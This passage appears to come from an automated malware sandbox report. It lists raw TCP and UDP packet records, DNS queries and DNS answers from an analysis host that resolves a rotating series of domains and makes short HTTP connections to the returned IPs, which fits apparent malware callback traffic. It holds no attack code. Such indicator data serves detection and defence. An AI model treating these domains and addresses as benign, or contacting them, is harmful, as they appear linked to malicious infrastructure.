                                                                                                                      Dec 7, 2023 13:44:55.138551950 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138566971 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138592005 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.138643026 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:56.284799099 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.300605059 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.488619089 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.488711119 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.488961935 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.677089930 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840565920 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840626001 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840698004 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.840703011 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840735912 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840754986 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840776920 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.840825081 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840843916 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840869904 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.840902090 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840945959 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.840962887 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.841003895 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.841038942 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.841047049 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.841057062 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.841074944 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.841097116 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.841129065 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:59.003196001 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.020015955 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.209043980 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.209218025 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.210172892 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.399490118 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.399594069 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.558335066 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.558475018 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.558489084 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.558500051 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.558511972 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.558521986 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.558525085 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.558532953 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.558545113 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.558547974 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.558567047 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.558585882 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.559009075 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.559030056 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.559042931 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.559056044 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.559073925 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.559099913 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:01.721885920 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:02.737796068 CET4974480192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:02.926459074 CET804974468.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:02.926632881 CET4974480192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:02.926841974 CET4974480192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:03.115081072 CET804974468.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:03.209561110 CET804974468.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:03.209634066 CET804974468.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:03.209846973 CET4974480192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:03.209846973 CET4974480192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:03.398302078 CET804974468.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:08.813347101 CET4974580192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:08.990118980 CET804974584.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:08.990207911 CET4974580192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:08.990952969 CET4974580192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:09.167781115 CET804974584.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:09.168344975 CET804974584.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:11.519438982 CET4974680192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:11.695302010 CET804974684.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:11.695430994 CET4974680192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:11.695784092 CET4974680192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:11.871579885 CET804974684.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:11.871854067 CET804974684.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:14.222606897 CET4974780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:14.399785042 CET804974784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:14.399899960 CET4974780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:14.400316954 CET4974780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:14.576704025 CET804974784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:14.577794075 CET804974784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:16.926455021 CET4974880192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:17.102689028 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.102807999 CET4974880192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:17.103097916 CET4974880192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:17.279105902 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.282356977 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.282399893 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.282460928 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.282557011 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.282620907 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.282655954 CET4974880192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:17.282655954 CET4974880192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:17.282705069 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.282764912 CET4974880192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:17.282824993 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.282936096 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.282979965 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.283015013 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:17.283051968 CET4974880192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:17.283096075 CET4974880192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:17.283690929 CET4974880192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:45:17.459681988 CET804974884.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:22.446964025 CET4974980192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:22.605091095 CET8049749208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:22.605201960 CET4974980192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:22.605555058 CET4974980192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:22.763914108 CET8049749208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:25.778964996 CET4975080192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:25.936880112 CET8049750208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:25.936995983 CET4975080192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:25.937215090 CET4975080192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:26.094851017 CET8049750208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:28.456664085 CET4975180192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:28.614880085 CET8049751208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:28.615000010 CET4975180192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:28.615396976 CET4975180192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:28.773542881 CET8049751208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.144251108 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:31.301726103 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.301832914 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:31.302057028 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:31.501528025 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.915719032 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.915802956 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.915873051 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:31.915924072 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.915966034 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.916003942 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.916039944 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.916048050 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:31.916076899 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.916081905 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:31.916114092 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:31.916153908 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:31.965487957 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.018707991 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:32.073911905 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.073960066 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.073997974 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.074033022 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.074167967 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:32.074203968 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:32.074892044 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.074930906 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.074997902 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:32.176481962 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.221860886 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:32.231803894 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.231846094 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.231882095 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:32.231955051 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:32.231969118 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:32.232199907 CET4975280192.168.2.8208.91.197.27
                                                                                                                      Dec 7, 2023 13:45:32.389630079 CET8049752208.91.197.27192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:45.656477928 CET4975380192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:45.825858116 CET8049753144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:45.826173067 CET4975380192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:45.826437950 CET4975380192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:45.995646000 CET8049753144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:46.129869938 CET8049753144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:46.129931927 CET8049753144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:46.130166054 CET4975380192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:47.331283092 CET4975380192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:48.347589970 CET4975480192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:48.516980886 CET8049754144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:48.517100096 CET4975480192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:48.517329931 CET4975480192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:48.686539888 CET8049754144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:48.699510098 CET8049754144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:48.699544907 CET8049754144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:48.699624062 CET4975480192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:50.018733978 CET4975480192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:51.035064936 CET4975580192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:51.203993082 CET8049755144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:51.204077005 CET4975580192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:51.204389095 CET4975580192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:51.373414993 CET8049755144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:51.373472929 CET8049755144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:51.386885881 CET8049755144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:51.386987925 CET8049755144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:51.387054920 CET4975580192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:52.706299067 CET4975580192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:53.722242117 CET4975680192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:53.891897917 CET8049756144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:53.892029047 CET4975680192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:53.892265081 CET4975680192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:54.061515093 CET8049756144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:54.072010994 CET8049756144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:54.072067022 CET8049756144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:54.072135925 CET4975680192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:54.072279930 CET4975680192.168.2.8144.217.103.3
                                                                                                                      Dec 7, 2023 13:45:54.241725922 CET8049756144.217.103.3192.168.2.8
                                                                                                                      Dec 7, 2023 13:46:00.276237011 CET4975780192.168.2.8103.120.80.111
                                                                                                                      Dec 7, 2023 13:46:00.631510019 CET8049757103.120.80.111192.168.2.8
                                                                                                                      Dec 7, 2023 13:46:00.634641886 CET4975780192.168.2.8103.120.80.111
                                                                                                                      Dec 7, 2023 13:46:00.634841919 CET4975780192.168.2.8103.120.80.111
                                                                                                                      Dec 7, 2023 13:46:00.989470005 CET8049757103.120.80.111192.168.2.8
                                                                                                                      Dec 7, 2023 13:46:00.989633083 CET8049757103.120.80.111192.168.2.8
                                                                                                                      Dec 7, 2023 13:46:00.989720106 CET4975780192.168.2.8103.120.80.111
                                                                                                                      Dec 7, 2023 13:46:02.143663883 CET4975780192.168.2.8103.120.80.111
                                                                                                                      Dec 7, 2023 13:46:02.498431921 CET8049757103.120.80.111192.168.2.8
                                                                                                                      Dec 7, 2023 13:46:03.159715891 CET4975880192.168.2.8103.120.80.111
                                                                                                                      Dec 7, 2023 13:46:03.510687113 CET8049758103.120.80.111192.168.2.8
                                                                                                                      Dec 7, 2023 13:46:03.510768890 CET4975880192.168.2.8103.120.80.111
                                                                                                                      Dec 7, 2023 13:46:03.510993958 CET4975880192.168.2.8103.120.80.111
                                                                                                                      Dec 7, 2023 13:46:03.862066984 CET8049758103.120.80.111192.168.2.8
                                                                                                                      Dec 7, 2023 13:46:03.862097025 CET8049758103.120.80.111192.168.2.8
                                                                                                                      Dec 7, 2023 13:46:03.862184048 CET4975880192.168.2.8103.120.80.111
                                                                                                                      Dec 7, 2023 13:46:05.471869946 CET4975880192.168.2.8103.120.80.111
                                                                                                                      Dec 7, 2023 13:46:05.822865009 CET8049758103.120.80.111192.168.2.8

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 7, 2023 13:42:23.223315001 CET5842853192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:42:23.666418076 CET53584281.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:39.880072117 CET4947853192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:42:40.878503084 CET4947853192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:42:41.878931046 CET4947853192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:42:42.954874039 CET53494781.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:42.954920053 CET53494781.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:42.954953909 CET53494781.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:59.207416058 CET5489453192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:42:59.446455002 CET53548941.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:16.504604101 CET4925053192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:43:16.747535944 CET53492501.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:30.410231113 CET5864253192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:43:30.913320065 CET53586421.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:44.894629002 CET6509253192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:43:45.894471884 CET6509253192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:43:46.377741098 CET53650921.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:46.377774000 CET53650921.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:49.533915997 CET6166053192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:43:50.519128084 CET6166053192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:43:50.873508930 CET53616601.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:50.873550892 CET53616601.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:55.879189014 CET5278953192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:43:56.878678083 CET5278953192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:43:56.893209934 CET53527891.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:57.004695892 CET53527891.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:11.707962990 CET5857253192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:44:12.045198917 CET53585721.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:26.113320112 CET6409953192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:44:27.112910032 CET6409953192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:44:27.176143885 CET53640991.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.237329960 CET53640991.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:40.567209959 CET4958153192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:44:40.887693882 CET53495811.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:54.457103014 CET5278053192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:44:54.588114023 CET53527801.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:08.222816944 CET5409453192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:45:08.811974049 CET53540941.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:22.285208941 CET6519153192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:45:22.445178986 CET53651911.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:37.239846945 CET6363153192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:45:37.369496107 CET53636311.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:45.427309036 CET5006953192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:45:45.655332088 CET53500691.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:59.081955910 CET6034053192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:46:00.081567049 CET6034053192.168.2.81.1.1.1
                                                                                                                      Dec 7, 2023 13:46:00.275094032 CET53603401.1.1.1192.168.2.8
                                                                                                                      Dec 7, 2023 13:46:00.275157928 CET53603401.1.1.1192.168.2.8

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 7, 2023 13:42:23.223315001 CET192.168.2.81.1.1.10x763cStandard query (0)www.ozzventures.shopA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:39.880072117 CET192.168.2.81.1.1.10xa4cdStandard query (0)www.fortunetravelsltd.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:40.878503084 CET192.168.2.81.1.1.10xa4cdStandard query (0)www.fortunetravelsltd.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:41.878931046 CET192.168.2.81.1.1.10xa4cdStandard query (0)www.fortunetravelsltd.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:59.207416058 CET192.168.2.81.1.1.10x875Standard query (0)www.porousworld.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:16.504604101 CET192.168.2.81.1.1.10x1013Standard query (0)www.greenharbor.infoA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:30.410231113 CET192.168.2.81.1.1.10xb0ebStandard query (0)www.lets-room.onlineA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:44.894629002 CET192.168.2.81.1.1.10xbe6bStandard query (0)www.hcfa-cis.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:45.894471884 CET192.168.2.81.1.1.10xbe6bStandard query (0)www.hcfa-cis.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:49.533915997 CET192.168.2.81.1.1.10x66bStandard query (0)www.hcfa-cis.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:50.519128084 CET192.168.2.81.1.1.10x66bStandard query (0)www.hcfa-cis.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:55.879189014 CET192.168.2.81.1.1.10x535cStandard query (0)www.sorenad.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:56.878678083 CET192.168.2.81.1.1.10x535cStandard query (0)www.sorenad.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:11.707962990 CET192.168.2.81.1.1.10x9fcbStandard query (0)www.medical-loan24.liveA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:26.113320112 CET192.168.2.81.1.1.10xf394Standard query (0)www.speedbikesglobal.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:27.112910032 CET192.168.2.81.1.1.10xf394Standard query (0)www.speedbikesglobal.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:40.567209959 CET192.168.2.81.1.1.10xefa5Standard query (0)www.belaflorloja.onlineA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:54.457103014 CET192.168.2.81.1.1.10x352Standard query (0)www.blessingstation.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:08.222816944 CET192.168.2.81.1.1.10xfc48Standard query (0)www.cjjmobbbshhhu.shopA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:22.285208941 CET192.168.2.81.1.1.10xabf3Standard query (0)www.hillcresthealth.onlineA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:37.239846945 CET192.168.2.81.1.1.10x4166Standard query (0)www.zbbqis.storeA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:45.427309036 CET192.168.2.81.1.1.10x7f09Standard query (0)www.hmoatl.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:59.081955910 CET192.168.2.81.1.1.10xfa92Standard query (0)www.633922.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:46:00.081567049 CET192.168.2.81.1.1.10xfa92Standard query (0)www.633922.comA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 7, 2023 13:42:23.666418076 CET1.1.1.1192.168.2.80x763cNo error (0)www.ozzventures.shopozzventures.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:23.666418076 CET1.1.1.1192.168.2.80x763cNo error (0)ozzventures.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:42.954874039 CET1.1.1.1192.168.2.80xa4cdNo error (0)www.fortunetravelsltd.comfortunetravelsltd.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:42.954874039 CET1.1.1.1192.168.2.80xa4cdNo error (0)fortunetravelsltd.com103.210.56.141A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:42.954920053 CET1.1.1.1192.168.2.80xa4cdNo error (0)www.fortunetravelsltd.comfortunetravelsltd.comCNAME (Canonical name)IN (0x0001)false
